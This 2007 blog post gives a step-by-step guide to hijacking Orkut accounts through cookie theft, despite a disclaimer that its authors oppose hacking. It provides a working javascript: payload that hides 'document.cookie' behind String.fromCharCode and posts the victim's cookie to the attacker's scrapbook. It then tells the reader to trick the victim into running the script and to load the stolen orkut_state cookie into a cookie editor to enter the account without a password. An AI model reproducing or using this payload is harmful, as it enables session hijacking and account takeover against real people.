Friday, July 20, 2007

Working of cookie transfer script.

This is only to inform users how hackers hack orkut using cookies. The cookie addon has not been given as we are against hacking.It's left to the user to search the world wide web for the exact script if he intents to hack someone.



javascript:nobody=replyForm;nobody.toUserId.value=62915936; nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)); nobody.action='Scrapbook.aspx?Action.submit';nobody.submit()

  • Place the script in the victims scrapbook/message. i.e ask him to run it.
  • Now that's it his cookie has been tranfered to you.

To the above script you need to make some changes like "62915936" has to be changed to get the cookie into your account.

In the cookie editor change the Gid with ours.

To see the cookie

  • After getting a cookie open the cookie editor plugin
  • Type orkut in the text box and click filter/refresh.
  • Scan for orkut_state cookie.
  • Replace the orkut_state part with your victims.

With this you can visit the vitims account without knowing his password

0 comments:

Post a Comment